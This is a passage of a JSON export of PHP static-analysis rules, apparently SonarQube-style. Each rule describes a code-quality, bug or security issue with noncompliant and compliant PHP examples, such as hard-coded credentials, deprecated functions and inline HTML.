12 &gt; 4 : 4;  \/\/ Noncompliant; always results in the same value\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($i) {\n  case 1:\n  case 3:\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  default:\n    doTheRest();\n}\n\nif (($a &gt;= 0 &amp;&amp; $a &lt; 10) || ($a &gt;= 20 &amp;&amp; $a &lt; 50)) {\n  doTheThing();\n}\nelse if ($a &gt;= 10 &amp;&amp; $a &lt; 20) {\n  doTheOtherThing();\n}\nelse {\n  doTheRest();\n}\n\ndoOneMoreThing();\n\n$b = 4;\n<\/pre>\n<p>or <\/p>\n<pre>\nswitch ($i) {\n  case 1:\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  case 3:\n    doThirdThing();\n    break;\n  default:\n    doTheRest();\n}\n\nif ($a &gt;= 0 &amp;&amp; $a &lt; 10) {\n  doTheThing();\n}\nelse if ($a &gt;= 10 &amp;&amp; $a &lt; 20) {\n  doTheOtherThing();\n}\nelse if ($a &gt;= 20 &amp;&amp; $a &lt; 50) {\n  doTheThirdThing();\n}\nelse {\n  doTheRest();\n}\n\nif ($b == 0) {\n  doOneMoreThing();\n}\nelse {\n  doTheRest();\n}\n\n$b = $a ? 12 &gt; 4 : 8;\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1996","repo":"php","name":"Files should contain only one top-level class or interface each","htmlDesc":"<p>A file that grows too much tends to aggregate too many responsibilities and inevitably becomes harder to understand and therefore to maintain. This\nis doubly true for a file with multiple top-level classes and interfaces. It is strongly advised to divide the file into one top-level class or\ninterface per file.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1997","repo":"php","name":"Files should not contain inline HTML","htmlDesc":"<p>Shared coding conventions allow teams to collaborate efficiently. 
To avoid the confusion that can be caused by tangling two coding languages in the\nsame file, inline HTML should be avoided.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\n$name = \"George\";\n?&gt;\n&lt;p&gt; Hello &lt;?php echo $name ?&gt;!&lt;\/p&gt;\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Files having the extension <code>.phtml<\/code> are ignored by this rule because they are expected to have mixed PHP and HTML.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1998","repo":"php","name":"References should not be passed to function calls","htmlDesc":"<p>Passing a reference to a function parameter means that any modifications the method makes to the parameter will be made to the original value as\nwell, since references have the effect of pointing two variables at the same memory space. This feature can be difficult to use correctly,\nparticularly if the callee is not expecting a reference, and the improper use of references in function calls can make code less efficient rather than\nmore efficient. <\/p>\n<p>Further, according to the PHP manual: <\/p>\n<blockquote>\n  As of PHP 5.3.0, you will get a warning saying that \"call-time pass-by-reference\" is deprecated... 
And as of PHP 5.4.0, call-time pass-by-reference\n  was removed, so using it will raise a fatal error.\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nmyfun(&amp;$name);  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nmyfun($name);\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/374\">MITRE, CWE-374<\/a> - Weakness Base Passing Mutable Objects to an Untrusted Method <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2000","repo":"php","name":"Files should not contain characters before \"<?php\"","htmlDesc":"<p>Having characters before <code>&lt;?php<\/code> can cause \"Cannot modify header information\" errors and similar problems with Ajax requests.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ntest&lt;?php  \/\/Noncompliant\n\/\/ ...\n<\/pre>\n<p>and<\/p>\n<pre>\n\/\/ Noncompliant; newline before opening tag\n&lt;?php\n\/\/ ...\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\n\/\/ ...\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2001","repo":"php","name":"Functions deprecated in PHP 5 should not be used","htmlDesc":"<p>Deprecated language features are those that have been retained temporarily for backward compatibility, but which will eventually be removed from\nthe language. In effect, deprecation announces a grace period to allow the smooth transition from the old features to the new ones. 
In that period, no\nuse of the deprecated features should be added to the code, and all existing uses should be gradually removed.<\/p>\n<p>The following functions were deprecated in PHP 5:<\/p>\n<table>\n  <tbody>\n    <tr>\n      <th>Deprecated<\/th>\n      <th>Use Instead<\/th>\n    <\/tr>\n    <tr>\n      <td><code>call_user_method()<\/code><\/td>\n      <td><code>call_user_func()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>call_user_method_array()<\/code><\/td>\n      <td><code>call_user_func_array()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>define_syslog_variables()<\/code><\/td>\n      <td><\/td>\n    <\/tr>\n    <tr>\n      <td><code>dl()<\/code><\/td>\n      <td><\/td>\n    <\/tr>\n    <tr>\n      <td><code>ereg()<\/code><\/td>\n      <td><code>preg_match()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>ereg_replace()<\/code><\/td>\n      <td><code>preg_replace()<\/code> (note that this is deprecated in PHP 5.5)<\/td>\n    <\/tr>\n    <tr>\n      <td><code>eregi()<\/code><\/td>\n      <td><code>preg_match()<\/code> with 'i' modifier<\/td>\n    <\/tr>\n    <tr>\n      <td><code>eregi_replace()<\/code><\/td>\n      <td><code>preg_replace()<\/code> with 'i' modifier<\/td>\n    <\/tr>\n    <tr>\n      <td><code>set_magic_quotes_runtime()<\/code> and its alias, <code>magic_quotes_runtime()<\/code><\/td>\n      <td><\/td>\n    <\/tr>\n    <tr>\n      <td><code>session_register()<\/code><\/td>\n      <td><code>$_SESSION<\/code> superglobal<\/td>\n    <\/tr>\n    <tr>\n      <td><code>session_unregister()<\/code><\/td>\n      <td><code>$_SESSION<\/code> superglobal<\/td>\n    <\/tr>\n    <tr>\n      <td><code>session_is_registered()<\/code><\/td>\n      <td><code>$_SESSION<\/code> superglobal<\/td>\n    <\/tr>\n    <tr>\n      <td><code>set_socket_blocking()<\/code><\/td>\n      <td><code>stream_set_blocking()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>split()<\/code><\/td>\n      <td><code>preg_split()<\/code><\/td>\n    
<\/tr>\n    <tr>\n      <td><code>spliti()<\/code><\/td>\n      <td><code>preg_split()<\/code> with 'i' modifier<\/td>\n    <\/tr>\n    <tr>\n      <td><code>sql_regcase()<\/code><\/td>\n      <td><\/td>\n    <\/tr>\n    <tr>\n      <td><code>mysql_db_query()<\/code><\/td>\n      <td><code>mysql_select_db()<\/code> and <code>mysql_query()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>mysql_escape_string()<\/code><\/td>\n      <td><code>mysql_real_escape_string()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td>Passing locale category names as strings<\/td>\n      <td>Use the LC_* family of constants<\/td>\n    <\/tr>\n  <\/tbody>\n<\/table>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2002","repo":"php","name":"Errors should not be silenced","htmlDesc":"<p>Just as pain is your body's way of telling you something is wrong, errors are PHP's way of telling you there's something you need to fix. Neither\npain, nor PHP errors should be ignored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n@doSomethingDangerous($password);  \/\/ Noncompliant; '@' silences errors from function call\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndoSomethingDangerous($password);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2003","repo":"php","name":"\"require_once\" and \"include_once\" should be used instead of \"require\" and \"include\"","htmlDesc":"<p>At root, <code>require<\/code>, <code>require_once<\/code>, <code>include<\/code>, and <code>include_once<\/code> all perform the same task of\nincluding one file in another. 
However, the way they perform that task differs, and they should not be used interchangeably.<\/p>\n<p><code>require<\/code> includes a file but generates a fatal error if an error occurs in the process.<\/p>\n<p><code>include<\/code> also includes a file, but generates only a warning if an error occurs.<\/p>\n<p>Predictably, the difference between <code>require<\/code> and <code>require_once<\/code> is the same as the difference between <code>include<\/code>\nand <code>include_once<\/code> - the \"_once\" versions ensure that the specified file is only included once. <\/p>\n<p>Because including the same file multiple times could have unpredictable results, the \"once\" versions are preferred.<\/p>\n<p>Because <code>include_once<\/code> generates only warnings, it should be used only when the file is being included conditionally, i.e. when all\npossible error conditions have been checked beforehand.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ninclude 'code.php';  \/\/Noncompliant; not a \"_once\" usage and not conditional\ninclude $user.'_history.php'; \/\/ Noncompliant\nrequire 'more_code.php';  \/\/ Noncompliant; not a \"_once\" usage\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nrequire_once 'code.php';\nif (is_member($user)) {\n  include_once $user.'_history.php';\n}\nrequire_once 'more_code.php';\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2004","repo":"php","name":"Functions should not be nested too deeply","htmlDesc":"<p>Nesting functions can quickly turn your code into \"spaghetti code\". 
Such code is hard to read, refactor and therefore to maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction f () {\n  function f_inner () {\n    function f_inner_inner() {\n      function f_inner_inner_inner() { \/\/ Noncompliant\n      }\n    }\n  }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"max","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S2005","repo":"php","name":"String literals should not be concatenated","htmlDesc":"<p>There is no reason to concatenate literal strings. Doing so is an exercise in reducing code readability. Instead, the strings should be\ncombined.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$msg = \"Hello \" . \"${name}\" . \"!\";  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$msg = \"Hello ${name}!\";\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2007","repo":"php","name":"Functions and variables should not be defined outside of classes","htmlDesc":"<p>Defining and using global variables and global functions, when the convention dictates OOP can be confusing and difficult to use properly for\nmultiple reasons:<\/p>\n<ul>\n  <li> You run the risk of name clashes. <\/li>\n  <li> Global functions must be stateless, or they can cause difficult-to-track bugs. <\/li>\n  <li> Global variables can be updated from anywhere and may no longer hold the value you expect. <\/li>\n  <li> It is difficult to properly test classes that use global functions. <\/li>\n<\/ul>\n<p>Instead of being declared globally, such variables and functions should be moved into a class, potentially marked <code>static<\/code>, so they can\nbe used without a class instance. 
<\/p>\n<p>This rule checks that only object-oriented programming is used and that no functions or procedures are declared outside of a class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\n\n$name = \"Bob\"; \/\/ Noncompliant\n\nfunction doSomething($arg) {   \/\/ Noncompliant\n  \/\/...\n}\n\nclass MyClass {\n    \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\nclass MyClass {\n\n  public static $name = \"Bob\"; \/\/ Compliant\n\n  public static function doSomething($arg) {              \/\/ Compliant\n    \/\/...\n  }\n  \/\/...\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2010","repo":"php","name":"\"&&\" and \"||\" should be used","htmlDesc":"<p>PHP has two sets of logical operators: <code>&amp;&amp;<\/code> \/ <code>||<\/code>, and <code>and<\/code> \/ <code>or<\/code>. The difference between\nthe sets is precedence. Because <code>and<\/code> \/ <code>or<\/code> have a lower precedence than almost any other operator, using them instead of\n<code>&amp;&amp;<\/code> \/ <code>||<\/code> may not have the result you expect.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$have_time = true;\n$have_money = false;\n$take_vacation = $have_time and $have_money;  \/\/ Noncompliant. $take_vacation == true.\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$have_time = true;\n$have_money = false;\n$take_vacation = $have_time &amp;&amp; $have_money;  \/\/ $take_vacation == false.\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2011","repo":"php","name":"\"global\" should not be used","htmlDesc":"<p>Global variables are a useful construct, but they should not be abused. Functions can access the global scope either through the\n<code>global<\/code> keyword or through the <code>$GLOBALS<\/code> array, but these practices considerably reduce the function's readability and\nreusability. 
Instead, the global variable should be passed as a parameter to the function.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$myGlobalVariable;\n\nfunction foo()\n{\n  global $myGlobalVariable; \/\/ Noncompliant\n  $GLOBALS['myGlobalVariable']; \/\/ Noncompliant\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo($myStateVariable)\n{\n  \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2014","repo":"php","name":"\"$this\" should not be used in a static context","htmlDesc":"<p><code>$this<\/code> refers to the current class instance. But static methods can be accessed without instantiating the class, and <code>$this<\/code>\nis not available to them. Using <code>$this<\/code> in a static context will result in a fatal error at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Clazz {\n  $name=NULL;  \/\/ instance variable\n\n  public static function foo(){\n    if ($this-&gt;name != NULL) {\n      \/\/ ...\n    }\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Clazz {\n  $name=NULL;  \/\/ instance variable\n\n  public static function foo($nameParam){\n    if ($nameParam != NULL) {\n      \/\/ ...\n    }\n  }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2036","repo":"php","name":"Files that define symbols should not cause side-effects","htmlDesc":"<p>Files that define symbols such as classes and variables may be included into many files. Simply performing that inclusion should have no effect on\nthose files other than declaring new symbols. For instance, a file containing a class definition should not also contain side-effects such as\n<code>print<\/code> statements that will be evaluated automatically on inclusion. Logic should be segregated into symbol-only files and\nside-effect-only files. 
The type of operation which is not allowed in a symbol-definition file includes but is not limited to: <\/p>\n<ul>\n  <li> generating output <\/li>\n  <li> modifying <code>ini<\/code> settings <\/li>\n  <li> emitting errors or exceptions <\/li>\n  <li> modifying global or static variables <\/li>\n  <li> reading\/writing files <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\n\nprint \"Include worked!\";\n\nclass foo {\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\n\nclass foo {\n\n  public function log() {\n    print \"Include worked!\";\n  }\n\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/www.php-fig.org\/psr\/psr-1\/\">PHP-FIG Basic Coding Standard PSR1<\/a>, 2.3 - Side Effects <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2037","repo":"php","name":"Static members should be referenced with \"static::\"","htmlDesc":"<p>References in a class to static class members (fields or methods) can be made using either <code>self::$var<\/code> or <code>static::$var<\/code>\n(introduced in 5.3). The difference between the two is one of scope. Confusingly, in subclasses, the use of <code>self::<\/code> references the\noriginal definition of the member, i.e. the superclass version, rather than any override at the subclass level. 
<code>static::<\/code>, on the other\nhand, references the class that was called at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\n\nclass Toy {\n\n    public static function status() {\n        self::getStatus();  \/\/ Noncompliant; will always print \"Sticks are fun!\" even when called from a subclass which overrides this method;\n    }\n\n    protected static function getStatus() {\n        echo \"Sticks are fun!\";\n    }\n}\n\nclass Ball extends Toy {\n\n    protected static function getStatus() {  \/\/ Doesn't actually get called\n        echo \"Balls are fun!\";\n    }\n}\n\n$myBall = new Ball();\n$myBall::status();  \/\/ Prints \"Sticks are fun!\"\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\n\nclass Toy {\n\n    public static function status() {\n        static::getStatus();  \/\/ Compliant\n    }\n\n    protected static function getStatus() {\n        echo \"Sticks are fun!\";\n    }\n}\n\nclass Ball extends Toy {\n\n    protected static function getStatus() {\n        echo \"Balls are fun!\";\n    }\n}\n\n$myBall = new Ball();\n$myBall::status();  \/\/ Prints \"Balls are fun!\"\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>No issue is raised when <code>self<\/code> is used on a constant field, a private field or a private method.<\/p>\n<pre>\nclass A\n{\n    private static $somevar = \"hello\";\n    const CONSTANT = 42;\n\n    private static function foo()\n    {\n        $var = self::$somevar . self::CONSTANT;  \/\/ Should be OK\n        self::foo();                               \/\/ Should be OK\n    }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2038","repo":"php","name":"Colors should be defined in upper case","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. 
Writing colors in upper case makes them stand out as such, thereby making the\ncode easier to read.<\/p>\n<p>This rule checks that hexadecimal color definitions are written in upper case.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$white = '#ffffff';  \/\/ Noncompliant\n$dkgray = '#006400';\n$aqua = '#00ffff';  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$white = '#FFFFFF';  \/\/ Compliant\n$dkgray = '#006400';\n$aqua = '#00FFFF';  \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2041","repo":"php","name":"Parentheses should not be used for calls to \"echo\"","htmlDesc":"<p><code>echo<\/code> can be called with or without parentheses, but it is best practice to leave parentheses off the call because using parentheses\nwith multiple arguments will result in a parse error.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\necho(\"Hello\");  \/\/ Noncompliant, but it works\necho(\"Hello\", \"World\"); \/\/ Noncompliant. Parse error\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\necho \"Hello\";\necho \"Hello\",\"World!\";\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2043","repo":"php","name":"Superglobals should not be accessed directly","htmlDesc":"<p>Superglobal variables are predefined variables available in all scopes throughout a script. However, accessing them directly is considered bad\npractice. 
Instead, they should be accessed through an object or framework that handles sanitization and validation.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$name = $_POST['name'];\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$name = $this-&gt;params()-&gt;fromPost('name');\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2044","repo":"php","name":"\"php_sapi_name()\" should not be used","htmlDesc":"<p>Both <code>php_sapi_name()<\/code> and the <code>PHP_SAPI<\/code> constant give the same value. But calling the method is less efficient than simply\nreferencing the constant. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (php_sapi_name() == 'test') { ... }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (PHP_SAPI == 'test') { ... }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2046","repo":"php","name":"Perl-style comments should not be used","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. This rule flags all Perl-style comments.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$myvar; # Noncompliant; this comment should have started with \"\/\/\"\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$myvar; \/\/ Compliant; this comment started with \"\/\/\"\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2047","repo":"php","name":"The names of methods with boolean return values should start with \"is\" or \"has\"","htmlDesc":"<p>Well-named functions can allow the users of your code to understand at a glance what to expect from the function - even before reading the\ndocumentation. 
Toward that end, methods returning a boolean property should have names that start with \"is\" or \"has\" rather than with \"get\".<\/p>\n<p>Note that this rule will only apply to functions that are documented to return a boolean.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/**\n * @return boolean\n *\/\npublic function getFoo() \/\/ Noncompliant\n{\n  return foo;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/**\n * @return boolean\n *\/\npublic function isFoo()\n{\n  return true;\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2050","repo":"php","name":"Alias functions should not be used","htmlDesc":"<p>Certain functions exist in PHP only as aliases of other functions. These aliases have been made available for backward compatibility, but should\nreally be removed from code. <\/p>\n<p>This rule looks for uses of the following aliases:<\/p>\n<table>\n  <tbody>\n    <tr>\n      <th>Alias<\/th>\n      <th>Replacement<\/th>\n    <\/tr>\n    <tr>\n      <td><code>chop<\/code><\/td>\n      <td><code>rtrim<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>close<\/code><\/td>\n      <td><code>closedir<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>doubleval<\/code><\/td>\n      <td><code>floatval<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>fputs<\/code><\/td>\n      <td><code>fwrite<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>ini_alter<\/code><\/td>\n      <td><code>ini_set<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>is_double<\/code><\/td>\n      <td><code>is_float<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>is_integer<\/code><\/td>\n      <td><code>is_int<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>is_long<\/code><\/td>\n      <td><code>is_int<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>is_real<\/code><\/td>\n      <td><code>is_float<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>is_writeable<\/code><\/td>\n      
<td><code>is_writable<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>join<\/code><\/td>\n      <td><code>implode<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>key_exists<\/code><\/td>\n      <td><code>array_key_exists<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>magic_quotes_runtime<\/code><\/td>\n      <td><code>set_magic_quotes_runtime<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>pos<\/code><\/td>\n      <td><code>current<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>show_source<\/code><\/td>\n      <td><code>highlight_file<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>sizeof<\/code><\/td>\n      <td><code>count<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>strchr<\/code><\/td>\n      <td><code>strstr<\/code><\/td>\n    <\/tr>\n  <\/tbody>\n<\/table>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$arr=array(\"apple\", \"pear\",\"banana\");\necho sizeof($arr);  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$arr=array(\"apple\", \"pear\",\"banana\");\necho count($arr);\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2068","repo":"php","name":"Credentials should not be hard-coded","htmlDesc":"<p>Because it is easy to extract strings from a compiled application, credentials should never be hard-coded. Do so, and they're almost guaranteed to\nend up in the hands of an attacker. 
This is particularly true for applications that are distributed.<\/p>\n<p>Credentials should be stored outside of the code in a strongly-protected encrypted configuration file or database.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$uname = \"steve\";\n$password = \"blue\";\nconnect($uname, $password);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$uname = getEncryptedUser();\n$password = getEncryptedPass();\nconnect($uname, $password);\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/798\">MITRE, CWE-798<\/a> - Use of Hard-coded Credentials <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/259\">MITRE, CWE-259<\/a> - Use of Hard-coded Password <\/li>\n  <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Porous Defenses <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/qQCHAQ\">CERT, MSC03-J.<\/a> - Never hard code sensitive information <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A2-Broken_Authentication_and_Session_Management\">OWASP Top Ten 2013 Category A2<\/a> -\n  Broken Authentication and Session Management <\/li>\n  <li> Derived from FindSecBugs rule <a href=\"http:\/\/h3xstream.github.io\/find-sec-bugs\/bugs.htm#HARD_CODE_PASSWORD\">Hard Coded Password<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S2260","repo":"php","name":"PHP parser failure","htmlDesc":"<p>When the PHP parser fails, it is possible to record the failure as a violation on the file. 
This way, not only is it possible to track the number\nof files that do not parse but also to find out easily why they do not parse.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2681","repo":"php","name":"Multiline blocks should be enclosed in curly braces","htmlDesc":"<p>Curly braces can be omitted from a one-line block, such as with an <code>if<\/code> statement or <code>for<\/code> loop, but doing so can be\nmisleading and induce bugs. <\/p>\n<p>This rule raises an issue when the indentation of the lines after a one-line block indicates an intent to include those lines in the block, but the\nomission of curly braces means the lines will be unconditionally executed once.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($condition)\n  firstActionInBlock();\n  secondAction();  \/\/ Noncompliant; executed unconditionally\nthirdAction();\n\n$str = null;\nfor ($i = 0; $i &lt; count($array); $i++)\n  $str = $array[$i];\n  doTheThing($str);  \/\/ Noncompliant; executed only on last array element\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($condition) {\n  firstActionInBlock();\n  secondAction();\n}\nthirdAction();\n\n$str = null;\nfor ($i = 0; $i &lt; count($array); $i++) {\n  $str = $array[$i];\n  doTheThing($str);\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/483.html\">MITRE, CWE-483<\/a> - Incorrect Block Delimitation <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/3wHEAw\">CERT, EXP52-J.<\/a> - Use braces for the body of an if, for, or while statement\n  <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2830","repo":"php","name":"Class constructors should not create other objects","htmlDesc":"<p>Dependency injection is a software design pattern in which one or more dependencies (or services) are injected, or passed by reference, into a\ndependent object (or client) 
and are made part of the client's state. The pattern separates the creation of a client's dependencies from its own\nbehavior, which allows program designs to be loosely coupled and to follow the dependency inversion and single responsibility principles.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass SomeClass {\n\n  public function __construct() {\n    $this-&gt;object = new SomeOtherClass();  \/\/ Noncompliant\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass SomeClass {\n\n  public function __construct(SomeOtherClass $object) {\n    $this-&gt;object = $object;\n  }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S3332","repo":"php","name":"Session-management cookies should not be persistent","htmlDesc":"<p>Cookies without fixed lifetimes or expiration dates are known as non-persistent, or \"session\" cookies, meaning they last only as long as the\nbrowser session, and poof away when the browser closes. Cookies with expiration dates, \"persistent\" cookies, are stored\/persisted until those\ndates.<\/p>\n<p>Non-persistent cookies should be used for the management of logged-in sessions on web sites. 
To make a cookie non-persistent, simply omit the\n<code>expires<\/code> attribute.<\/p>\n<p>This rule raises an issue when <code>expires<\/code> is set for a session cookie, either programmatically or via configuration, such as\n<code>session.cookie_lifetime<\/code>.<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n  (XSS) <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Session_Management_Cheat_Sheet#Expire_and_Max-Age_Attributes\">OWASP, Session Management Cheat\n  Sheet<\/a> - Expire and Max-Age Attributes <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3333","repo":"php","name":"\"open_basedir\" should limit file access","htmlDesc":"<p>The <code>open_basedir<\/code> configuration in <em>php.ini<\/em> limits the files the script can access using, for example, <code>include<\/code> and\n<code>fopen()<\/code>. Leave it out, and there is no default limit, meaning that any file can be accessed. Include it, and PHP will refuse to access\nfiles outside the allowed path.<\/p>\n<p><code>open_basedir<\/code> should be configured with a directory, which will then be accessible recursively. However, the use of <code>.<\/code>\n(current directory) as an <code>open_basedir<\/code> value should be avoided since it's resolved dynamically during script execution, so a\n<code>chdir('\/')<\/code> command could lay the whole server open to the script.<\/p>\n<p>This is not a fool-proof configuration; it can be reset or overridden at the script level. But its use should be seen as a minimum due diligence\nstep. 
